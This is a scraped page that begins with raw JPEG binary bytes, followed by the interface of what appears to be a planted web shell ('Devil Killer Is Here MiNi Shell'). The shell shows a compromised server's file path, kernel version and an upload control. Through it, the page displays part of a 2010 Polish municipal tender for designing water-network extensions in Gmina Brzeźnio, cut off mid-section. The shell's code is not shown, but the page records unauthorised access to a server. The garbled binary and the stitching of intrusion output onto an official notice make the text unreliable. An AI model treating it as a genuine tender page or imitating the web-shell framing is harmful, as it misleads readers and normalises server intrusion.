JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100701/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100701/191724-N-2010.html

<p class="kh_header"><b>Brzeźnio: OPRACOWANIE DOKUMENTACJI PROJEKTOWEJ ORAZ SPECYFIKACJI TECHNICZNYCH
WYKONANIA I ODBIORU ROBÓT BUDOWLANYCH DLA ROZBUDOWY SIECI WODOCIĄGOWYCH W GMINIE BRZEŹNIO</b><br>
<b>Numer ogłoszenia: 191724 - 2010; data zamieszczenia: 01.07.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Brzeźnio , ul. Wspólna 44, 98-275 Brzeźnio, woj. łódzkie, tel. 043 8203026, 043 8203024, faks 043 8203671.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.brzeznio.finn.pl</li><li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> nie dotyczy</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> OPRACOWANIE DOKUMENTACJI PROJEKTOWEJ ORAZ SPECYFIKACJI TECHNICZNYCH
WYKONANIA I ODBIORU ROBÓT BUDOWLANYCH DLA ROZBUDOWY SIECI WODOCIĄGOWYCH W GMINIE BRZEŹNIO.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest usługa:
OPRACOWANIE DOKUMENTACJI PROJEKTOWEJ ORAZ SPECYFIKACJI TECHNICZNYCH
WYKONANIA I ODBIORU ROBÓT BUDOWLANYCH DLA ROZBUDOWY SIECI WODOCIĄGOWYCH WRAZ Z PRZYŁĄCZAMI W GMINIE BRZEŹNIO

Przedmiotem Zamówienia jest opracowanie dokumentacji projektowej, przedmiaru robót, specyfikacji technicznej wykonania i odbioru robót oraz kosztorysu inwestorskiego na rozbudowę sieci wodociągowej wraz z przyłączami w miejscowościach: Rydzew, Złotowizna, Kolonia Gozdeckie, Brzeźnio, Kolonia Nowa Wieś, Ruszków - Zapole, Bronisławów w kierunku Podcabaja, Tumidaj, Wierzbowa, Kliczków Kolonia, Brzeźnio - Pustelnik, Bronisławów Centrum, Barczew, Krzaki - Pustelnik; powiat: sieradzki, woj. łódzkie.

Przybliżona długość sieci wodociągowej do zaprojektowania wynosi około 18 350 m.
Przybliżona ilość przyłączy wodociągowych wynosi około 80 sztuk.
Opis sytuacyjny i wstępne warunki techniczne na wykonanie projektu rozbudowy sieci wodociągowych wraz z przyłączami w Gminie Brzeźnio.

Zadanie nr 1  Rydzew
 Odcinek północno - zachodni (Sudajew)
Sieć wodociągową rozbudować wpinając się w działkę nr 26 w miejscowości Rydzew 
o przekroju O 110 PCV prowadząc nitkę w kierunku północno - wschodnim w kierunku zabudowań  określonych na mapie pomocniczej nr 1.
Odcinek północno - wschodni.
Sieć wodociągową rozbudować wpinając się w działkę nr 32 w miejscowości Rydzew 
o przekroju O 110 PCV prowadząc nitkę w kierunku wschodnim do  zabudowań  określonych na mapie pomocniczej nr 1.
Odcinek południowo - zachodni (od miejscowości Ostrów).
Sieć wodociągową rozbudować wpinając się w drodze nr 565 na wysokości działki 479  
w miejscowości Ostrów o przekroju O 110 PCV prowadząc nitkę w kierunku wschodnim 
w kierunku zabudowań  określonych na mapie pomocniczej nr 1.
Zadanie nr 2 Złotowizna
Sieć wodociągową rozbudować wpinając się na wysokości działki nr 92/1 w miejscowości Złotowizna o przekroju O 110  PCV prowadząc nitkę w kierunku północnym przechodząc przez rzekę Myja a następnie w kierunku zachodnim do zabudowań  określonych na mapie pomocniczej nr 2.
Zadanie nr 3 Kolonia Gozdeckie
Sieć wodociągową rozbudować wpinając się na wysokości działki nr 82 w miejscowości Brączynno o przekroju O 110  PCV prowadząc nitkę w kierunku zachodnim do zabudowań  określonych na mapie pomocniczej nr 3.
Zadanie nr 4 Brzeźnio ul. Spacerowa
Sieć wodociągową poprowadzić w kierunku południowym do zabudowań określonych na mapie pomocniczej nr 4 wpinając się w istniejącą  na działce nr 295 O 110 PCV.
Zadanie nr 5 Kolonia Nowa Wieś 
Sieć wodociągową rozbudować wpinając się w działkę nr 56 w miejscowości Nowa Wieś 
o przekroju 110 PCV prowadząc nitkę w kierunku północnym wzdłuż drogi nr 14 a następnie na wschód w kierunku zabudowań określonych na mapie pomocniczej nr 5.
Zadanie nr 6 Stefanów Ruszkowski - Ruszków
Sieć wodociągową rozbudować wpinając się w działkę nr 62/3 w miejscowości   Ruszków 
o przekroju 110 PCV prowadząc nitkę w kierunku północnym wzdłuż drogi gminnej określonej na mapie pomocniczej nr 6.
Zadanie nr 7  Ruszków - Zapole
Sieć wodociągową rozbudować wpinając się w projektowaną sieć w działce nr 230 
w miejscowości   Zapole o przekroju O 110 PCV prowadząc nitkę w kierunku północnym  do zabudowań określonych na mapie pomocniczej nr 6.
Zadanie nr 8 Bronisławów w kierunku Podcabaja
Sieć wodociągową rozbudować wpinając się w działkę nr 89 w miejscowości   Bronisławów do projektowanego wodociągu o przekroju O 160 PCV prowadząc nitkę w kierunku zachodnim do zabudowań określonych na mapie pomocniczej nr 7.
Sieć wodociągową rozbudować wpinając się w projektowaną sieć po południowej stronie drogi gminnej nr 583 (z Brzeźnia do Podcabaja) w miejscowości Bronisławów o przekroju 
O 160 PCV budując w kierunku południowym zabudowania określone na mapie pomocniczej nr 7.
 Zadanie nr 9 Tumidaj Stacja paliw
Sieć wodociągową rozbudować wpinając się w sieć o przekroju O 90  po zachodniej stronie drogi nr 14 w miejscowości Tumidaj. Wodę należy doprowadzić do Stacji paliw dz nr 78/1, posesji nr 36 Tumidaj działki 78/2 po przeciwnej stronie drogi krajowej określonej na mapie pomocniczej nr 8.
Sieć wodociągową rozbudować wpinając się w sieć o przekroju O 110 PCV  w drodze gminnej  nr 186/5 w miejscowości Próba prowadząc nitkę w kierunku północnym. Wodę należy doprowadzić do dz nr 184/7 określonej  na mapie pomocniczej nr 8.
Zadanie nr 10 Wierzbowa 
Sieć wodociągową rozbudować wpinając się w działkę nr 264 w miejscowości   Wierzbowa 
o przekroju O 90 PCV prowadząc nitkę w kierunku północno -wschodnim w kierunku zabudowań  określonych na mapie pomocniczej nr 9.



Zadanie nr 11 Kliczków Kolonia 
Sieć wodociągową rozbudować wpinając się w drodze gminne nr 194 w miejscowości Kliczków Kolonia  -  przekrój O 110 PCV prowadząc nitkę w kierunku południowym 
w kierunku zabudowań znajdujących się na działce nr 258/1 określonych na mapie pomocniczej nr 10.
Zadanie nr 12 Brzeźnio - Pustelnik 
Sieć wodociągową rozbudować wpinając się w działkę nr 118 w miejscowości  Tumidaj 
o przekroju O 110 PCV prowadząc nitkę w kierunku północno -wschodnim w kierunku zabudowań  określonych na mapie pomocniczej nr 8
Zadanie nr 13 Bronisławów 
Sieć wodociągową rozbudować wpinając się w sieć o przekroju O 110 PCV umieszczonej 
w działce nr 105 w miejscowości Bronisławów. Wodę należy doprowadzić do zabudowań 
w kierunku południowo -zachodnim określonych na mapie pomocniczej nr 11.
Zadanie nr 14  Barczew  
Sieć wodociągową rozbudować wpinając się w sieć o przekroju O 110 PCV umieszczonej 
w drodze gminnej nr 887 w miejscowości Barczew na wysokości dz nr 349 Barczew. Wodę należy doprowadzić do zabudowań w kierunku północnym określonych na mapie pomocniczej nr 12.
Zadanie nr 15 Krzaki 
Sieć wodociągową rozbudować wpinając się w sieć o przekroju O 90 PCV umieszczonej na działce 24 w miejscowości Pustelnik. Wodę należy doprowadzić do zabudowań w kierunku północno -wschodnim określonych na mapie pomocniczej nr 13.

Dokumentację na sieć (projekty budowlane, specyfikacje techniczne wykonania i odbioru robót, kosztorysy inwestorskie, przedmiary, kosztorysy nakładcze) należy sporządzić oddzielnie dla każdego z w/w zadań od 1 do 15.
Ponadto sporządzić należy oddzielnie kosztorysy (inwestorskie i nakładcze) dotyczące przyłączy wodociągowych.

Zakres rzeczowy zamówienia obejmuje:
a) Wykonanie projektów budowlanych spełniających wymogi Rozporządzenia w sprawie szczegółowego zakresu i formy projektu budowlanego (Dz. U. 2003 nr 120 poz. 1133) uzyskanie wszystkich niezbędnych uzgodnień, postanowień, decyzji w celu uzyskania pozwolenia na budowę.
b) Wykonanie przedmiarów robót oraz specyfikacji technicznych wykonania i odbioru robót budowlanych
c) Opracowanie kosztorysów inwestorskich zgodnie z Rozporządzeniem Ministra Infrastruktury z dnia 18 maja 2004 r. (Dz. U. 2004 nr 130 poz. 1389) w sprawie określenia metod i podstaw sporządzania kosztorysu inwestorskiego, obliczania planowanych kosztów prac projektowych oraz planowanych kosztów robót budowlanych określonych w programie funkcjonalno-użytkowym, dla projektów wykonanych przez Wykonawcę dla każdego zadania (od 1 do 15) odrębnie.



Do obowiązków Wykonawcy należeć będzie w szczególności:
- pozyskanie i weryfikacja wszystkich danych niezbędnych do prawidłowego zaprojektowania przedmiotu Zamówienia,
- wykonanie pomiarów geodezyjnych i opracowanie map do celów projektowych, w razie zapotrzebowania wykonanie map informacyjnych i ewidencyjnych;
- uzyskanie wyrysu i wypisu z rejestru gruntów dla działek będących stronami postępowań administracyjnych;
- wykonanie w miarę potrzeb inwentaryzacji istniejącej sieci wodociągowej i innych obiektów w zakresie potrzebnym dla sporządzenia projektu budowlanego. Inwentaryzacją powinny zostać objęte również te obiekty, które występują na trasie planowanego zakresu rzeczowego, a w szczególności które mogą kolidować z obiektami zaprojektowanymi;
- uzyskanie brakujących danych do projektowania w terenie oraz od organów wydających stosowne opinie,
- sporządzenie inwentaryzacji zieleni i wykazu drzew do usunięcia wraz z wyceną (preliminarzem kosztów);
- zaproponowanie wywozu, zagospodarowania lub utylizację odpadów powstałych w związku 
z realizacją zaprojektowanych robót, w tym nadmiaru ziemi, asfaltu z rozbiórki nawierzchni dróg itp.;
- uzyskanie wymaganych decyzji, w tym decyzji o ustaleniu lokalizacji inwestycji celu publicznego i decyzji o środowiskowych uwarunkowaniach zgody na realizację przedsięwzięcia, uzgodnień i opinii dotyczących projektu,
- sporządzenie operatów wodnoprawnych  i uzyskanie koniecznych decyzji wodnoprawnych;
- połączenie projektowanego układu z istniejącym układem wodociągowym,
- opis techniczny projektu musi zawierać informacje dotyczące charakterystyki technicznej, 	rozwiązań materiałowych, parametrów eksploatacyjnych itp. poszczególnych projektowanych obiektów
- zestawienie materiałów i wykaz urządzeń
- projekt organizacji ruchu zastępczego na czas wykonywania robót (jeżeli wystąpi).
- sporządzenie wzoru (zaakceptowanego przez Zamawiającego) umowy cywilnoprawnej dotyczącej wyrażenia zgody na wejście w teren dla działek prywatnych na okres realizacji robót oraz na eksploatację sieci i urządzeń po wykonaniu robót budowlanych, zwrotu kosztów wykonania przyłączy wodociągowych wraz z uzyskaniem wszystkich wymaganych zgód 
w tym zakresie;
- sporządzenie projektu budowlanego zgodnie z Rozporządzeniem Ministra Infrastruktury 
z dnia 3 lipca 2003 r. (Dz.U. 2003 nr 120 poz. 1133) w sprawie szczegółowego zakresu 
i formy projektu budowlanego (w oparciu o projekty koncepcyjne i uwagi Zamawiającego, jeśli takie zgłosi) i uzyskanie dla niego wynikających z przepisów: opinii, zgód, uzgodnień, decyzji i pozwoleń niezbędnych do uzyskania Decyzji pozwolenia na budowę;
- sporządzenie informacji dotyczącej bezpieczeństwa i ochrony zdrowia;
- sporządzenie przedmiarów robót zgodnie z Rozporządzeniem Ministra Infrastruktury z dnia 
2 września 2004 roku (Dz.U. 2004 nr 202 poz. 2072) w sprawie szczegółowego zakresu 
i formy dokumentacji projektowej, specyfikacji technicznych wykonania i odbioru robót budowlanych oraz programu funkcjonalno - użytkowego;
- sporządzenie kosztorysów nakładczych;
- sporządzenie kosztorysów inwestorskich zgodnie z Rozporządzeniem Ministra Infrastruktury z 18 maja 2004 r. w sprawie określenia metod i podstaw sporządzania kosztorysu inwestorskiego, obliczania planowanych kosztów prac projektowych oraz planowanych kosztów robót budowlanych określonych w programie funkcjonalno-użytkowym, z podziałem na branże i etapy wynikające z dokumentacji projektowej (Dz.U. 2004 Nr 130 poz. 1389);
- sporządzenie specyfikacji technicznych wykonania i odbioru robót budowlanych zgodnie 
z Rozporządzeniem Ministra Infrastruktury z dnia 2 września 2004 roku (Dz.U. 2004 nr 202 poz. 2072) w sprawie szczegółowego zakresu i formy dokumentacji projektowej, specyfikacji technicznych wykonania i odbioru robót budowlanych oraz programu funkcjonalno - użytkowego.
- Wykonawca będzie w pierwszej kolejności podejmował działania na rzecz uzyskania pozwoleń, uzgodnień i decyzji, których uzyskanie może być limitujące dla uzyskania wszystkich decyzji 	administracyjnych niezbędnych do wykonania zakresu rzeczowego Przedsięwzięcia.
- Wykonawca w oparciu o dostępną dokumentację oraz wizje w terenie powinien uwzględnić 
w przygotowywanej dokumentacji koszty odbudowy nawierzchni, a także odbudowy, wymiany lub przebudowy odcinków istniejącej infrastruktury podziemnej, naziemnej 
i nadziemnej w miejscach gdzie może ona ulec uszkodzeniu w wyniku prowadzonych robót.
- Opisywanie proponowanych materiałów i urządzeń poprzez podanie parametrów technicznych, gatunków materiału przy zachowaniu wymogów Ustawy Prawo zamówień publicznych art. 29. umożliwi to Zamawiającemu przeprowadzenie przetargu na wybór Wykonawcy robót budowlanych wg niniejszej dokumentacji.
- Po zakończeniu procesu projektowania, przed oddaniem jej na ZUD, Wykonawca przedłoży kompletną dokumentację do Zamawiającego celem uzyskania ostatecznego uzgodnienia.
- Wykonawca otrzyma upoważnienie Zamawiającego do reprezentowania go 
i występowania w jego imieniu w sprawach związanych z opracowaniem Dokumentacji Projektowej oraz uzyskaniem niezbędnych opinii, zgód, uzgodnień, decyzji i pozwoleń niezbędnych do uzyskania pozwolenia na budowę.
- Wszelkie opłaty administracyjne ponoszone w wyniku prowadzonych działań związanych 
z uzyskiwaniem uzgodnień, opinii i decyzji Wykonawca winien wliczyć do ceny opracowania dokumentacji projektowej.
- Pełnienia nadzoru autorskiego w trakcie realizacji inwestycji, zgodnie z aktualnie 	obowiązującymi przepisami Prawa Budowlanego.

Wszystkie warunki jednostek uzgadniających muszą być wprowadzone do projektu

Wszystkie projekty muszą zawierać instrukcje obsługi, eksploatacji i bezpieczeństwa pracy zgodnie 
z przepisami prawa, oraz uzgodnienia z Zamawiającym.
Rozmiary arkuszy rysunków powinny być zgodne z rozmiarami powszechnie stosowanymi na świecie. Rysunki wszystkich elementów konstrukcyjnych powinny być czytelne i kompletne. Zastosowana skala zależeć będzie od rodzaju rysunku i/lub przedstawianych szczegółów. Zaleca się stosowanie następujących skal:
	- Plan trasy sieci wodociągowych  - 1:500 i/lub 1:1000
	- Profile sieci - skala pozioma zgodna ze skalą planu, skala pionowa 5 do 10 razy większą niż skala 	pozioma.
	- Plany terenu, schematy - 1:500 i/ lub 1: 1000
	- Rysunki  ogólne i zestawieniowe  - 1:50 i/lub 1:100
	- Szczegóły - 1:20 do 1:5

Wykonawca w toku prac projektowych przekaże dwa egzemplarze wszystkich rysunków i obliczeń Zamawiającemu  do akceptacji. W ciągu 7 dni Zamawiający zwróci jedną kopię rysunków i obliczeń Wykonawcy ze swoimi komentarzami. Zmiany i/lub uwagi wykonane przez Zamawiającego na rysunkach lub obliczeniach będą natychmiast naniesione a poprawione rysunki i/lub obliczenia przedłożone ponownie w dwóch egzemplarzach do uzyskania akceptacji. 
Wszystkie modyfikacje wymagane przez Zamawiającego będą wykonywane bez dodatkowej opłaty. W przypadku, gdy Wykonawca nie będzie zgadzał się ze zmianami wprowadzonymi przez Zamawiającego, wówczas prześle pisemne zawiadomienie do Zamawiającego w terminie pięciu dni od daty otrzymania zmienionego rysunku (rysunków). W takim przypadku, w razie potrzeby, Wykonawca ponownie przedłoży Zamawiającemu dany rysunek (rysunki) i obliczenia w trzech egzemplarzach w celu uzyskania komentarza niezależnego eksperta. Koszt opiniowania przez niezależnego eksperta pokrywa w takiej sytuacji Wykonawca. 
Zamawiający przewiduje możliwość zgłaszania uwag i żądania dokonywania poprawek w projektach tylko w przypadku uchybień w odniesieniu do jego zgodności z Rozporządzeniem Ministra Infrastruktury z dnia 3 lipca 2003 r. w sprawie szczegółowego zakresu i formy projektu budowlanego (Dz. U. 03.120.1133), Rozporządzeniem Ministra Infrastruktury z dnia 2 września 2004 r. w sprawie szczegółowego zakresu i formy dokumentacji projektowej, specyfikacji technicznych wykonania 
i odbioru robót budowlanych. 
Za błędy w zaakceptowanych projektach odpowiada Wykonawca.
Zawartość opracowania:
- projekt budowlany - po 6 egz. (oddzielnie dla każdego z zadań od 1 do 15 wykazanych 
w siwz str. 3-5)
- kosztorys nakładczy na wykonanie sieci wodociągowych - po 2 egz. (oddzielnie dla każdego z zadań od 1 do 15 wykazanych w siwz str. 3-5)
- kosztorysy nakładcze na wykonanie przyłączy wodociągowych - po 2 egz.
- przedmiar robót na wykonanie sieci wodociągowych - po 2 egz. (oddzielnie dla każdego z zadań od 1 do 15 wykazanych w siwz str. 3-5)
- przedmiary robót na wykonanie przyłączy wodociągowych - po 2 egz.
- kosztorys inwestorski na wykonanie sieci wodociągowych - po 2 egz. (oddzielnie dla każdego z zadań od 1 do 15 wykazanych w siwz str. 3-5)
- kosztorysy inwestorskie na wykonanie przyłączy wodociągowych - po 2 egz.
- operat wodnoprawny - 3 egz. (dla każdego wniosku o pozwolenie wodnoprawne odrębny) (jeżeli wystąpi)
- projekt organizacji ruchu zastępczego na czas wykonywania robót (jeżeli wystąpi) - 2 egz. (dla każdego ciągu komunikacyjnego odrębny, wg wymagań)
- specyfikacje techniczne wykonania i odbioru robót budowlanych - 2 egz.

Wykonawca przekaże Zamawiającemu pełną dokumentację projektową w formie papierowej oraz cyfrowej (na nośniku CD-R). Cyfrowa wersja dokumentacji opracowana w ramach Zamówienia, powinna być przekazana w formacie edytowalnym przez MS OFFICE (Word, Excel). Dodatkowo należy przekazać cyfrową wersję opracowanej dokumentacji w formacie *.pdf. 
Opisane powyżej prace zostaną wykonane w zakresie Zamówienia i w ramach przedstawionej ceny ofertowej.

Przepisy prawne związane z projektowaniem
Wykonawca wszystkie dokumenty objęte przedmiotem zamówienia opracuje zgodnie 
z obowiązującymi przepisami prawa na dzień przekazania dokumentacji Zamawiającemu. 
Opracowane dokumentacje powinny zawierać pisemne oświadczenie, że przedmiotu umowy jest wykonany zgodnie z umową, obowiązującymi przepisami oraz zasadami wiedzy technicznej i został wydany w stanie kompletnym z punktu widzenia celu, któremu ma służyć. 


Stosowanie się do prawa i innych przepisów 
Wykonawca zobowiązany jest znać wszystkie przepisy wydane przez władze centralne i miejscowe oraz inne przepisy i wytyczne, które są w jakikolwiek sposób związane z robotami i będzie w pełni odpowiedzialny za przestrzeganie tych praw, przepisów i wytycznych podczas projektowania. Wykonawca będzie przestrzegać praw patentowych i będzie w pełni odpowiedzialny za wypełnienie wszelkich wymagań prawnych odnośnie wykorzystania opatentowanych urządzeń lub metod, dołączając do dokumentacji projektowej kopie zezwoleń i inne odnośne dokumenty. 

Równoważność norm i zbiorów przepisów prawnych 
Przywołane konkretne normy lub przepisy, które spełniać mają materiały, wyposażenie, sprzęt i inne przewidziane do zastosowania towary, oraz przewidziane do wykonania roboty, będą obowiązywać postanowienia najnowszego wydania lub poprawionego wydania przywołanych norm i przepisów.

Zakres odpowiedzialności Wykonawcy
Wykonawca ponosi odpowiedzialność za:
	1) fachową i terminową realizację usług,
	2) zapewnienie współpracy odpowiednio wykwalifikowanych specjalistów,
	3) zapewnienie odpowiedniej obsługi logistycznej i administracyjnej niezbędnej dla realizacji Umowy,

Zaplecze biurowe
Wykonawca musi na własny koszt oraz przy pomocy własnego wysiłku organizacyjnego zapewnić każdy potrzebny sprzęt i wymagane przepisami licencjonowane oprogramowanie z prawem do korzystania, potrzebne do prawidłowego wykonania niniejszego zamówienia. W ciągu całego okresu wykonywania zamówienia, łącznie z okresem sprawowania nadzoru autorskiego Wykonawca zapewni bezawaryjne środki łączności. W przypadku zmiany adresów lub innych danych teleadresowych istotnych z punktu widzenia powiadamiania Wykonawcę przez Zamawiającego lub uczestników procesu inwestycyjnego Wykonawca niezwłocznie powiadomi wszystkie zainteresowane osoby 
i podmioty o zmianach tych adresów lub danych teleadresowych.

Obowiązki Zamawiającego
Zamawiający, przekaże Wykonawcy niezbędne dla realizacji zadania posiadane projekty, dokumentacje techniczne i inne opracowania.

Wykonawca udzieli inwestorowi pisemnej gwarancji jakości na wykonany i odebrany projekt budowlany na okres 60 miesięcy, licząc od dnia odbioru projektu budowlanego.

Jeżeli gdziekolwiek w niniejszej SIWZ (dokumentacji przetargowej) pojawia się nazwa, marka lub typ wskazujący na konkretnego producenta, należy to interpretować, że określenie ma jedynie charakter przykładowy, a wykonawca sporządzając ofertę może uwzględnić wyrób każdego innego producenta, który jest równoważny tzn. posiada co najmniej takie same lub korzystniejsze parametry wydajnościowe i jakościowe oraz standard wykonania 
w stosunku do podanych w SIWZ przykładów. Parametry wydajnościowe i jakościowe zostały wskazane w dokumentacji projektowej.
Zamawiający zastrzega sobie prawo do oceny równoważności proponowanych rozwiązań.
Zamawiający zastrzega sobie także prawo do korzystania z opinii ekspertów..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje udzielenie w okresie 3 lat od podpisania umowy zamówień uzupełniających, o których mowa w art. 67, ust. 1, pkt 7 Prawo zamówień publicznych. Zamawiający przewiduje udzielić zamówienia uzupełniające do wysokości 20% wartości zamówienia podstawowego.</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 71.30.00.00-1, 71.32.00.00-7.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 29.10.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie ustanawia szczegółowego warunku w tym zakresie.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca musi wykazać, że w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy w tym okresie, wykonał co najmniej dwie dokumentacje projektowe budowy (rozbudowy, przebudowy) sieci wodociągowych 
o długości co najmniej 10 km.</p>
